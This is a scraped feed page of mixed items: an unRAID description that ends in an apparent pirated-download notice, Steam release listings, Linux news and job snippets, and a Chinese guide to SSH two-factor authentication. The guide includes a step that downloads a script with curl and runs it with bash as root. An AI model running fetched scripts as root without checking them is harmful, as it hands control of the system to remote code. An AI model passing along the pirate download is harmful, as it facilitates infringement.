Unlike most RAID systems, unRAID saves data to individual drives. To                                                                                                                                    simplify manageability, users can create shares that allow files written to them to be spread across multiple drives. Each share can be thought of as a top-level folder on a drive. When browsing through a share, all data from all drives that participate in that share will be displayed together. Users do not need to know which disk a file is on in order to access it under a share. Shares can be tuned to include/exclude specific disks and to utilize various methods for determining how files are allocated across those disks.

In addition to controlling how data is distributed across drives, users can also control what network protocols the share is visible through as well as define user-level security policy. When accessing your unRAID server over a network protocol, all shares exported through that protocol will be visible, but you can toggle protocols for both individual shares as well as at a global setting level. Should you have private data on your system that you wish to protect from anonymous access, user accounts can be created and policies defined to limit access to only trusted individuals. In addition to this concept of user shares, entire individual disks can be shared individually as well for advanced management capabilities. The simple concept with shares is that they enable you to organize your data any way you want.

Hardware Requirements:
Contains detailed information about the hardware requirements for each of the three primary functions of unRAID Server OS 6.

USB Flash Device
unRAID Server runs entirely from RAM, minimizing writes to the Flash device; however, it is also used to store vital system configuration data and must remain installed in your server during operation. In addition, to obtain a registration key for unRAID Server OS, your flash device must contain a unique GUID (Globally Unique Identifier) and needs to be at least 1GB in size, but no larger than 32GB. A few of the brands that are known for this include:

- Lexar Firefly or JumpDrive
- SanDisk Cruzer Fit
- Sony Micro Vault Tiny

There are a number of USB Flash devices that do not have a valid serial number and can not be registered:
- Lacie MosKeyto
- Delock USB2.0 Nano Memory stick
- Maxell ONYX
- There may be others.

Store and Protect Data
In order to install and begin taking advantage of the basic NAS capabilities unRAID Server OS 6 has to offer, you will need to meet the following minimum hardware requirements:

- A 64-bit capable processor (1.0 GHz or better)
- At least 1GB of RAM
- Linux hardware driver support (for storage, Ethernet, and USB controllers)
- At least one hard disk drive (two if you wish to protect your data with a parity disk)

Homepage -

https://lime-technology.com


Download link:


Links are Interchangeable - No Password - Single Extraction


          New Game: Fishing Planet: Christmas Magic Pack      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Dec 18, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Dec 18, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Dec 18, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


          New Game: Fishing Planet: Santa's Kayak Pack      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Dec 18, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Dec 18, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Dec 18, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


          New Game: Fishing Planet: Christmas Giant's Pack      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Dec 15, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Dec 15, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Dec 15, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


          New Game: Fishing Planet: Sport Topwater Night Pack      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Nov 17, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Nov 17, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Nov 17, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


          New Game: Fishing Planet: Kayaks Adventure Pack      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Oct 19, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Oct 19, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Oct 19, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


          New Game: Fishing Planet: Topwater Midnight Pack      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Sep 01, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Sep 01, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Sep 01, 2017
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


          New Game: Shiver      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Oct 25, 2017
Published by:  Kowai Sugoi Studios
Developed by:  Kowai Sugoi Studios
Distributed by:  Valve Corporation
Game Engine by:  Unity Technologies, Inc.
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Oct 25, 2017
Published by:  Kowai Sugoi Studios
Developed by:  Kowai Sugoi Studios
Distributed by:  Valve Corporation
Game Engine by:  Unity Technologies, Inc.
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Oct 25, 2017
Published by:  Kowai Sugoi Studios
Developed by:  Kowai Sugoi Studios
Distributed by:  Valve Corporation
Game Engine by:  Unity Technologies, Inc.
Release Comments:  Steam release


          New Game: Fishing Planet: Tricky Treats Pack      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Oct 26, 2018
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Oct 26, 2018
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Oct 26, 2018
Published by:  Fishing Planet LLC.
Distributed by:  Valve Corporation
Release Comments:  Steam release


          New Game: Don't Starve Together: Hallowed Nights Belongings Chest      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Oct 25, 2018
Published by:  Klei Entertainment Inc.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Oct 25, 2018
Published by:  Klei Entertainment Inc.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Oct 25, 2018
Published by:  Klei Entertainment Inc.
Distributed by:  Valve Corporation
Release Comments:  Steam release


          New Game: Don't Starve Together: Hallowed Nights Survivors Chest      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Oct 25, 2018
Published by:  Klei Entertainment Inc.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Oct 25, 2018
Published by:  Klei Entertainment Inc.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Oct 25, 2018
Published by:  Klei Entertainment Inc.
Distributed by:  Valve Corporation
Release Comments:  Steam release


          New Game: The Way of Life: Definitive Edition      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Jun 18, 2018
Published by:  CyberCoconut
Developed by:  CyberCoconut
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Mar 15, 2018
Published by:  CyberCoconut
Developed by:  CyberCoconut
Distributed by:  Valve Corporation
Release Comments:  Steam release


          New Game: The Way of Life: Free Edition      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Dec 29, 2014
Published by:  CyberCoconut
Developed by:  CyberCoconut
Distributed by:  Valve Corporation
Release Comments:  Early Access version (Steam release)


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Dec 29, 2014
Published by:  CyberCoconut
Developed by:  CyberCoconut
Distributed by:  Valve Corporation
Release Comments:  Early Access version (Steam release)


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Dec 29, 2014
Published by:  CyberCoconut
Developed by:  CyberCoconut
Distributed by:  Valve Corporation
Release Comments:  Early Access version (Steam release)


          New Game: Caffeine      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Oct 07, 2015
Published by:  Incandescent Imaging
Developed by:  Incandescent Imaging
Distributed by:  Valve Corporation
Game Engine by:  Epic Games, Inc.
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Oct 05, 2015
Published by:  Incandescent Imaging
Developed by:  Incandescent Imaging
Distributed by:  Valve Corporation
Game Engine by:  Epic Games, Inc.
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Oct 05, 2015
Published by:  Incandescent Imaging
Developed by:  Incandescent Imaging
Distributed by:  Valve Corporation
Game Engine by:  Epic Games, Inc.
Release Comments:  Steam release


          New Game: Circle Empires: Apex Monsters!      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Oct 25, 2018
Published by:  Iceberg Interactive B.V.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Oct 25, 2018
Published by:  Iceberg Interactive B.V.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Oct 25, 2018
Published by:  Iceberg Interactive B.V.
Distributed by:  Valve Corporation
Release Comments:  Steam release


          New Game: Farm Together: Wasabi Pack      Cache   Translate Page      

Release Information
Platform:  Linux
Countries:  Worldwide
Date:  Oct 25, 2018
Published by:  Milkstone Studios S.L.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Macintosh
Countries:  Worldwide
Date:  Oct 25, 2018
Published by:  Milkstone Studios S.L.
Distributed by:  Valve Corporation
Release Comments:  Steam release


Release Information
Platform:  Windows
Countries:  Worldwide
Date:  Oct 25, 2018
Published by:  Milkstone Studios S.L.
Distributed by:  Valve Corporation
Release Comments:  Steam release


          Non, la puce T2 n’empêche pas d’installer Linux      Cache   Translate Page      
La polémique est apparue hier, quand le site Phoronix a publié un article indiquant que la puce T2 des Mac récents bloquerait toute installation de Linux. Depuis, l’information a fait le tour de quelques sites, alors même qu’elle n’est pas nouvelle et qu’elle est en grande partie fausse. Non, la puce T2 n’empêche pas d’installer une distribution GNU/Linux, même si l’utilisateur doit désactiver une partie de ses fonctions de sécurité pour y parvenir. La puce T2 sur la carte-mère d’un MacBook Pro de 2018 (image iFixit) L’iMac Pro, les MacBook Pro 13 et 15 pouces de 2018, le nouveau MacBook Air et le nouveau Mac mini sont tous équipés d’une puce ARM, nommée Apple T2. Celle-ci se charge globalement de la sécurité du système, à la fois en gérant le SSD chiffré à la volée, en contrôlant plusieurs aspects du matériel et en particulier la webcam ou le microphone, et aussi en vérifiant au démarrage que le système d’exploitation n’est pas corrompu. C’est cette dernière fonction, nommée... Lire la suite sur MacGeneration
          today's howtos      Cache   Translate Page      

          Senior Site Reliability Engineer (DevOps/R&D/AWS) - Cvent - Fredericton, NB      Cache   Translate Page      
CI Server administration and support (Jenkins). Solid Windows and Linux administration skills. Enlighten, Enable and Empower a fast-growing set of multi...
From Cvent - Fri, 02 Nov 2018 06:25:11 GMT - View all Fredericton, NB jobs
          Comment on 7 Reasons Why I Use Manjaro Linux And You Should Too by AlephAlpha      Cache   Translate Page      
Manjaro is the most beautiful distro with xfce desktop.
          Comment on Librem 5 is a Security and Privacy Focused Smartphone Based on Linux by Hubert      Cache   Translate Page      
I don't like thin phones, because they bend easily and are difficult to grip. On the contrary if they could reduce its height and width, by making it thicker i'd prefer that.
          Comment on Fix Grub Not Showing For Windows 10 Linux Dual Boot by thasmeer      Cache   Translate Page      
Thank You Very much, this worked for me after lots of searching
          Comment on 6 Best Linux Distributions for Beginners in 2018 by someone      Cache   Translate Page      
I can agree in many points with your comment. And you are right about lazy coulture BUT, this generation does not have an option or they are trapt in the coulture that tries to slave them. When somebody gets the point of open source he will be prepared to learn and help others. Anyway even if there are some lazy individuals we musn't loose the faith in others who doesn't know the opens source ideas and options. All the best!! And thanks for nice article!
          Anleitung: Grafische Linux-Anwendungen unter Windows 10 starten      Cache   Translate Page      

Der Tutonaut
Anleitung: Grafische Linux-Anwendungen unter Windows 10 starten

Ihr wollt grafische Linux-Anwendungen nativ unter Windows 10 starten? Mit dem Windows Subsystem für Linux ist das (fast) kein Problem.

Den vollständigen Artikel "Anleitung: Grafische Linux-Anwendungen unter Windows 10 starten" von Boris Hofferbert auf Der Tutonaut weiterlesen.


          为Fedora 15周年庆生 回顾Core 1的诞生史      Cache   Translate Page      

2003年11月6日,Red Hat 宣布推出 Fedora Core 1,这是 Fedora Project 的首个软件,而这份公告亦标志着一个在 Red Hat 和社区之间协作开发的项目的诞生。Fedora.us 推出几个月后,便在其主页发布了重大声明,宣布 Red Hat Linux 正在与 Fedora Linux 合并,而 Fedora Project 亦由此诞生。

阅读全文
          类 XP 系统 ReactOS 0.4.10 正式发布 更稳定更漂亮      Cache   Translate Page      

ReactOS 0.4.10 正式版已发布,ReactOS 是一个基于 Windows NT 架构设计原则的开源操作系统。由于所有的代码都经过重新编写,ReactOS 并不是一个基于 Linux 的操作系统,而且不包含任何 UNIX 架构。

阅读全文
          OGO pocketweb ct-17 mini telefon - Új - Jelenlegi ára: 5 000 Ft      Cache   Translate Page      
OGO pocketweb ct-17 mini telefon. Webezni, emailezni, telefonalni. Okos kis keszulek. Tamogat bluetoothot es gprs-t, jar hozza egy vodafone sim kartya 800ft lebeszelhetoseggel. A kartya es a telefon is vadiuj, csak tesztelve lettek. a dobozt felreraktam arrol nincs kep, egy sima kartondoboz. Anyaghasznalat teren kifogastalan. Vilagit a billentyuzet keken.
Ha valakinek van otlete hogy lehet linuxot rapakolni, irja meg kerem
https: //en. wikipedia. org/wiki/Ogo_(handheld_device)
OGO pocketweb ct-17 mini telefon - Új
Jelenlegi ára: 5 000 Ft
Az aukció vége: 2018-11-13 01:11
          I.38 Administrador Linux      Cache   Translate Page      
Argentina - con la seguridad de la información manteniendo presente el concepto en todo el ciclo de vida de la infraestructura. -Colaborar en las necesidades... de parches de seguridad, actualizaciones críticas. Proponer mecanismos de automatización de estas tareas. -Desarrollar programas...
          Administrador Linux      Cache   Translate Page      
Argentina - con la seguridad de la información manteniendo presente el concepto en todo el ciclo de vida de la infraestructura. -Colaborar en las necesidades... de parches de seguridad, actualizaciones críticas. Proponer mecanismos de automatización de estas tareas. -Desarrollar programas...
          Amazon Linux: supporto Java fino al 2023      Cache   Translate Page      
Amazon estende il supporto gratuito alle versioni di OpenJDK che Oracle dismetterà entro il 2020. Leggi Amazon Linux: supporto Java fino al 2023
          How to prevent some firewall from terminating SQL*Plus sessions with long-running statements?      Cache   Translate Page      
Hi Tom, In know that I should talk to the firewall admins to get things fixed but this is - unfortunately - out of scope. So here we go: We have a database running on some Linux server and some client application running on some W2k16 server. T...
          Embedded Linux Software Engineer - Security - Satcom Direct - Ottawa, ON      Cache   Translate Page      
SD Avionics, located in Ottawa, designs and manufactures communication products in support of these services....
From Satcom Direct - Tue, 18 Sep 2018 18:40:10 GMT - View all Ottawa, ON jobs
          libreoffice-still (6.0.7)      Cache   Translate Page      
LibreOffice is the free power-packed Open Source personal productivity suite for Windows, Macintosh and Linux, that gives you six feature-rich applications for all your document production and data processing needs.

          libreoffice-fresh (6.1.3)      Cache   Translate Page      
LibreOffice is the free power-packed Open Source personal productivity suite for Windows, Macintosh and Linux, that gives you six feature-rich applications for all your document production and data processing needs.

          jGnash 2.36.1      Cache   Translate Page      

jGnash jest całkowicie darmowym narzędziem (licencja GNU GPL) stworzonym do zarządzania osobistymi finansami. Posiada wiele opcji spotykanych tylko w komercyjnych projektach tego typu.

Aplikacja jest bardzo przydatna do śledzenia wydatków oraz przychodów. Celem twórców było stworzenie prostego, a jednocześnie funkcjonalnego narzędzia finansowego, które będzie udostępniane całkowicie bezpłatnie. Daje możliwość tworzenia prostych raportów w formacie PDF, oferuje import QIF i QFX, dokładne kalkulacje, wsparcie dla skryptów BeanShell i JavaScript, obsługę wielu walut z całego świata i wiele innych. jGnash powinien bez problemów działać na każdej platformie, która obsługuje Java 1.6 (m.in. Windows, Mac OS X, Linux).


          jGnash 2.36.1      Cache   Translate Page      

jGnash jest całkowicie darmowym narzędziem (licencja GNU GPL) stworzonym do zarządzania osobistymi finansami. Posiada wiele opcji spotykanych tylko w komercyjnych projektach tego typu.

Aplikacja jest bardzo przydatna do śledzenia wydatków oraz przychodów. Celem twórców było stworzenie prostego, a jednocześnie funkcjonalnego narzędzia finansowego, które będzie udostępniane całkowicie bezpłatnie. Daje możliwość tworzenia prostych raportów w formacie PDF, oferuje import QIF i QFX, dokładne kalkulacje, wsparcie dla skryptów BeanShell i JavaScript, obsługę wielu walut z całego świata i wiele innych. jGnash powinien bez problemów działać na każdej platformie, która obsługuje Java 1.6 (m.in. Windows, Mac OS X, Linux).


          jGnash 2.36.1      Cache   Translate Page      

jGnash jest całkowicie darmowym narzędziem (licencja GNU GPL) stworzonym do zarządzania osobistymi finansami. Posiada wiele opcji spotykanych tylko w komercyjnych projektach tego typu.

Aplikacja jest bardzo przydatna do śledzenia wydatków oraz przychodów. Celem twórców było stworzenie prostego, a jednocześnie funkcjonalnego narzędzia finansowego, które będzie udostępniane całkowicie bezpłatnie. Daje możliwość tworzenia prostych raportów w formacie PDF, oferuje import QIF i QFX, dokładne kalkulacje, wsparcie dla skryptów BeanShell i JavaScript, obsługę wielu walut z całego świata i wiele innych. jGnash powinien bez problemów działać na każdej platformie, która obsługuje Java 1.6 (m.in. Windows, Mac OS X, Linux).


          如何在Linux作業系統上交叉編譯Rust程式?      Cache   Translate Page      
當Rust程式開發完成,要進入部署階段的時候,開發時用的系統環境和投入使用時用的系統環境不一定會相同,例如用x86_64桌上型電腦和Linux作業系統開發ARM64樹莓派上的程式,在部署的時候我們就需要針對樹莓派所使用的CPU架構和作業系統來做程式的重新編譯,否則如果直接將x86_64桌上型電腦的Linux作業系統下編譯出來的程式,放到ARM64樹莓派內的話,就算都是使用Linux作業系統,程式也還是無法執行的。但是如果我們真的要將Rust的程式專案放進樹莓派來編譯的話,那肯定是很花時間的!所以有沒有什麼方式是可以在原本的開發環境中,針對不同的系統環境來編譯出程式呢?
          Acronis Disk Director 12 build 12.5.158      Cache   Translate Page      

Acronis Disk Director 12 to zaawansowane narzędzie pozwalające przeprowadzać różnorakie operacje na dyskach. Zapewnia obsługę dysków dynamicznych i GPT, tworzenie woluminów na kilku dyskach jednocześnie i wiele innych.

Acronis Disk Director 12 został oparty o wielokrotnie nagradzane technologie Acronis i pozwala na przenoszenie lub łączenie partycji bez utraty danych. Poza przenoszeniem danych mamy również możliwość klonowania dysków, co znacząco przełoży się na oszczędności w czasie, który należałoby przeznaczyć na reinstalację systemu, najważniejszych programów i sterowników.

Tworzenie partycji, nadawanie im oznaczeń, zmiana rozmiaru odbywają się za pośrednictwem niezwykle czytelnej szaty graficznej, która znacząco redukuje popełnienie jakiegoś błędu przez użytkownika mogącego skutkować kolejnymi komplikacjami.

Każdy użytkownik komputera doświadczył utraty danych. Największy problem stanowi skasowanie całej partycji. Acronis Disk Director 12 pozwala również na przywracanie woluminów bez względu na przyczynę ich usunięcia. W sytuacji, gdy nie możemy uzyskać bezpośredniego dostępu do systemu, aplikację uruchomimy również z dowolnej pamięci zewnętrznej jak CD/DVD czy USB.

Narzędzie z powodzeniem może zostać wykorzystane do diagnozy dysku twardego, gdyż prezentuje szczegółowe dane na jego temat. Producent przewidział również dodanie funkcji ukrywania partycji, co może okazać się niezastąpione, gdy na jednej z nich przechowujemy szczególnie wrażliwe dane.

Program cechuje duża szybkość działania oraz silne ukierunkowanie na sprawne działanie systemu, o czym świadczy opcja automatycznej optymalizacji użycia przestrzenie dyskowej. Wszelkie operacje wykonamy na nośnikach z systemem plików FAT16, FAT32, NTFS, Exts, Ext3, Reiser3, Linux, SWAP.


          Sr. DevOps Architect - SGA - OCI Inc. - Saskatoon, SK      Cache   Translate Page      
Experience with Linux and Windows server administration. Eight years of experience in Software Development with an emphasis on DevOps....
From Indeed - Sat, 03 Nov 2018 00:34:35 GMT - View all Saskatoon, SK jobs
          Shellbot Botnet Targets Linux, Android Devices      Cache   Translate Page      
An IRC bot built using Pearl is targeting Internet of Things (IoT) devices and Linux servers, but can also affect Windows systems and Android devices, Trend Micro warns. read more Source link
          Trisquel 8.0 LTS Flidas – The 100% Libre Linux OS, Using MATE & Powered By Linux-Libre 4.4      Cache   Translate Page      

Trisquel 8.0 is the latest release of Trisquel Linux Distribution that’s endorsed by the Free Software Foundation. this release based on Ubuntu 16.04 LTS, using MATE desktop 1.12 as default desktop environment and powered by Linux-libre 4.4 LTS kernel. The desktop environment shifted over to MATE as they wanted a Linux desktop not requiring OpenGL […]

The post Trisquel 8.0 LTS Flidas – The 100% Libre Linux OS, Using MATE & Powered By Linux-Libre 4.4 appeared first on Linux Scoop.


          What’s New in Elementary OS 5.0 Juno      Cache   Translate Page      

Elementary OS 5.0 Juno, the latest release of Elementary OS has been released by Elementary OS developer , This new release is based on Ubuntu 18.04 Long Term Support (LTS) and powered by Linux Kernel 4.15. The pantheon desktop, default desktop of elementary OS get more polished and updated. added brand new Night Light feature […]

The post What’s New in Elementary OS 5.0 Juno appeared first on Linux Scoop.


          What’s New in Ubuntu 18.10 Cosmic Cuttlefish      Cache   Translate Page      

Ubuntu 18.10 Cosmic Cuttlefish the new release of Ubuntu linux Distribution, this release ships with latest GNOME 3.30 as default desktop enviroment and Powered by a Linux kernel 4.18 series. Also include new Yaru theme, the bold, the frivolous, yet distinctly Ubuntu saw further improvements and touchups. Integrates beautifully with GNOME 3.30 Desktop and improves […]

The post What’s New in Ubuntu 18.10 Cosmic Cuttlefish appeared first on Linux Scoop.


          在 Ubuntu 和 Debian 上启用双因子身份验证的三种备选方案      Cache   Translate Page      

如何为你的 SSH 服务器安装三种不同的双因子身份验证方案。

如今,安全比以往更加重要,保护 SSH 服务器是作为系统管理员可以做的最为重要的事情之一。传统地,这意味着禁用密码身份验证而改用 SSH 密钥。无疑这是你首先应该做的,但这并不意味着 SSH 无法变得更加安全。

双因子身份验证就是指需要两种身份验证才能登录。可以是密码和 SSH 密钥,也可以是密钥和第三方服务,比如 Google。这意味着单个验证方法的泄露不会危及服务器。

以下指南是为 SSH 启用双因子验证的三种方式。

当你修改 SSH 配置时,总是要确保有一个连接到服务器的第二终端。第二终端意味着你可以修复你在 SSH 配置中犯的任何错误。打开的终端将一直保持,即便 SSH 服务重启。

SSH 密钥和密码

SSH 支持对登录要求不止一个身份验证方法。

/etc/sh/sshd_config 中的 SSH 服务器配置文件中的 AuthenticationMethods 选项中设置了身份验证方法。

当在 /etc/ssh/sshd_config 中添加下一行时,SSH 需要提交一个 SSH 密钥,然后提示输入密码:

AuthenticationMethods "publickey,password"

如果你想要根据使用情况设置这些方法,那么请使用以下附加配置:

Match User jsmith
    AuthenticationMethods "publickey,password"

当你已经编辑或保存了新的 sshd_config 文件,你应该通过运行以下程序来确保你没有犯任何错误:

sshd -t

任何导致 SSH 不能启动的语法或其他错误都将在这里标记出来。当 ssh-t 运行时没有错误,使用 systemctl 重新启动 SSH:

systemctl restart sshd

现在,你可以使用新终端登录,以核实你会被提示输入密码并需要 SSH 密钥。如果你用 ssh-v,例如:

ssh -v jsmith@example.com

你将可以看到登录的每一步。

注意,如果你确实将密码设置成必需的身份验证方法,你要确保将 PasswordAuthentication 选项设置成 yes

使用 Google Authenticator 的 SSH

Google 在 Google 自己的产品上使用的双因子身份验证系统可以集成到你的 SSH 服务器中。如果你已经使用了Google Authenticator,那么此方法将非常方便。

虽然 libpam-google-authenticator 是由 Google 编写的,但它是开源的。此外,Google Authenticator 是由 Google 编写的,但并不需要 Google 帐户才能工作。多亏了 Sitaram Chamarty 的贡献。

如果你还没有在手机上安装和配置 Google Authenticator,请参阅 这里的说明。

首先,我们需要在服务器上安装 Google Authenticatior 安装包。以下命令将更新你的系统并安装所需的软件包:

apt-get update
apt-get upgrade
apt-get install libpam-google-authenticator

现在,我们需要在你的手机上使用 Google Authenticatior APP 注册服务器。这是通过首先运行我们刚刚安装的程序完成的:

google-authenticator

运行这个程序时,会问到几个问题。你应该以适合你的设置的方式回答,然而,最安全的选项是对每个问题回答 y。如果以后需要更改这些选项,您可以简单地重新运行 google-authenticator 并选择不同的选项。

当你运行 google-authenticator 时,一个二维码会被打印到终端上,有些代码看起来像这样:

Your new secret key is: VMFY27TYDFRDNKFY
Your verification code is 259652
Your emergency scratch codes are:
  96915246
  70222983
  31822707
  25181286
  28919992

你应该将所有这些代码记录到一个像密码管理器一样安全的位置。“scratch codes” 是单一的使用代码,即使你的手机不可用,它总是允许你访问。

要将服务器注册到 Authenticator APP 中,只需打开应用程序并点击右下角的红色加号即可。然后选择扫描条码选项,扫描打印到终端的二维码。你的服务器和应用程序现在连接。

回到服务器上,我们现在需要编辑用于 SSH 的 PAM (可插入身份验证模块),以便它使用我们刚刚安装的身份验证器安装包。PAM 是独立系统,负责 Linux 服务器上的大多数身份验证。

需要修改的 SSH PAM 文件位于 /etc/pam.d/sshd ,用以下命令编辑:

nano /etc/pam.d/sshd

  在文件顶部添加以下行:

auth required pam_google_authenticator.so

此外,我们还需要注释掉一行,这样 PAM 就不会提示输入密码。改变这行:

# Standard Un*x authentication.
@include common-auth

为如下:

# Standard Un*x authentication.
# @include common-auth
``` 

接下来,我们需要编辑 SSH 服务器配置文件:

nano /etc/ssh/sshd_config “`

改变这一行:

ChallengeResponseAuthentication no

为:

ChallengeResponseAuthentication yes

  接下来,添加以下代码行来启用两个身份验证方案:SSH 密钥和谷歌认证器(键盘交互):

AuthenticationMethods "publickey,keyboard-interactive"

  在重新加载 SSH 服务器之前,最好检查一下在配置中没有出现任何错误。执行以下命令:

sshd -t

如果没有标识出任何错误,用新的配置重载 SSH:

systemctl reload sshd.service

  现在一切都应该开始工作了。现在,当你登录到你的服务器时,你将需要使用 SSH 密钥,并且当你被提示输入:

Verification code:

打开 Authenticator APP 并输入为您的服务器显示的 6 位代码。

Authy

Authy 是一个双重身份验证服务,与 Google 一样,它提供基于时间的代码。然而,Authy 不需要手机,因为它提供桌面和平板客户端。它们还支持离线身份验证,不需要 Google 帐户。

你需要从应用程序商店安装 Authy 应用程序,或 Authy 下载页面所链接的桌面客户端。

安装完应用程序后,需要在服务器上使用 API 密钥。这个过程需要几个步骤:

  1. 这里注册一个账户。
  2. 向下滚动到 “Authy” 部分。
  3. 在帐户上启用双因子认证(2FA)。
  4. 回 “Authy” 部分。
  5. 为你的服务器创建一个新的应用程序。
  6. 从新应用程序的 “General Settings” 页面顶部获取 API 密钥。你需要 &ldquoRODUCTION API KEY”旁边的眼睛符号来显示密钥。如图:

在某个安全的地方记下 API 密钥。

现在,回到服务器,以 root 身份运行以下命令:

curl -O 'https://raw.githubusercontent.com/authy/authy-ssh/master/authy-ssh'
bash authy-ssh install /usr/local/bin

  当提示时输入 API 键。如果输入错误,你始终可以编辑 /usr/local/bin/authy-ssh 再添加一次。

Authy 现已安装。但是,在为用户启用它之前,它不会开始工作。启用 Authy 的命令有以下形式:

/usr/local/bin/authy-ssh enable <system-user> <your-email> <your-phone-country-code> <your-phone-number>

  root 登录的一些示例细节:

/usr/local/bin/authy-ssh enable root john@example.com 44 20822536476

  如果一切顺利,你会看到:

User was registered

现在可以通过运行以下命令来测试 Authy:

authy-ssh test

最后,重载 SSH 实现新的配置:

systemctl reload sshd.service

  Authy 现在正在工作,SSH 需要它才能登录。

现在,当你登录时,你将看到以下提示:

Authy Token (type 'sms' to request a SMS token):

  你可以输入手机或桌面客户端的 Authy APP 上的代码。或者你可以输入 sms, Authy 会给你发送一条带有登录码的短信。

可以通过运行以下命令卸载 Authy:

/usr/local/bin/authy-ssh uninstall

via: https://bash-prompt.net/guides/ssh-2fa/

作者:Elliot Cooper 译者:cielllll 校对:wxy

本文由 LCTT 原创编译,Linux中国 荣誉推出


          Python 数据科学入门      Cache   Translate Page      

不需要昂贵的工具即可领略数据科学的力量,从这些开源工具起步即可。

无论你是一个具有数学或计算机科学背景的资深数据科学爱好者,还是一个其它领域的专家,数据科学提供的可能性都在你力所能及的范围内,而且你不需要昂贵的,高度专业化的企业级软件。本文中讨论的开源工具就是你入门时所需的全部内容。

Python,其机器学习和数据科学库(pandasKerasTensorFlowscikit-learnSciPyNumPy 等),以及大量可视化库(MatplotlibpyplotPlotly 等)对于初学者和专家来说都是优秀的自由及开源软件工具。它们易于学习,很受欢迎且受到社区支持,并拥有为数据科学而开发的最新技术和算法。它们是你在开始学习时可以获得的最佳工具集之一。

